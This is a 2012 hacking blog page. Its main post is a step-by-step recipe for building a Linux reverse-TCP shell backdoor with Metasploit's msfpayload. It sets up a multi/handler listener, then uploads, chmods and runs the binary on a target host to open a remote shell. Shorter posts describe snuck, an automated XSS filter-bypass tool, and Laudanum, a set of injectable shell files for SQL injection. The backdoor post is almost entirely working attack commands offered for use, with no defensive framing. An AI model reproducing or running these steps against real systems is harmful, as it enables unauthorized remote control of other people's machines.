Oct 25, 2012

Linux Backdoor With Metasploit

Msfpayload
1. ./msfpayload linux/x64/shell/reverse_tcp LHOST=192.168.168.100 LPORT=4444 X > backdoor
2. In msfconsole
> use multi/handler
> set PAYLOAD linux/x64/shell/reverse_tcp
> set LHOST 192.168.168.100
> set LPORT 4444
> exploit

3. Upload backdoor to host
4. Change mode file
$ chmod +x backdoor
5. Run it.
$ ./backdoor    
  

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 24, 2012

Snuch - Automatic XSS filter bypass

snuck is an automated tool that may definitely help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer. The approach, it adopts, is based on the inspection of the injection's reflection context and relies on a set of specialized and obfuscated attack vectors for filter evasion. In addition, XSS testing is performed in-browser, a real web browser is driven for reproducing the attacker's behavior and possibly the victim's.  

Source: http://code.google.com/p/snuck/wiki/Tutorial

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 21, 2012

Laudanum - Collection Of Injecatable Files.

Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.


Source: http://blog.opensecurityresearch.com/2012/09/manually-exploiting-tomcat-manager.html
             http://sourceforge.net/projects/laudanum/ 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |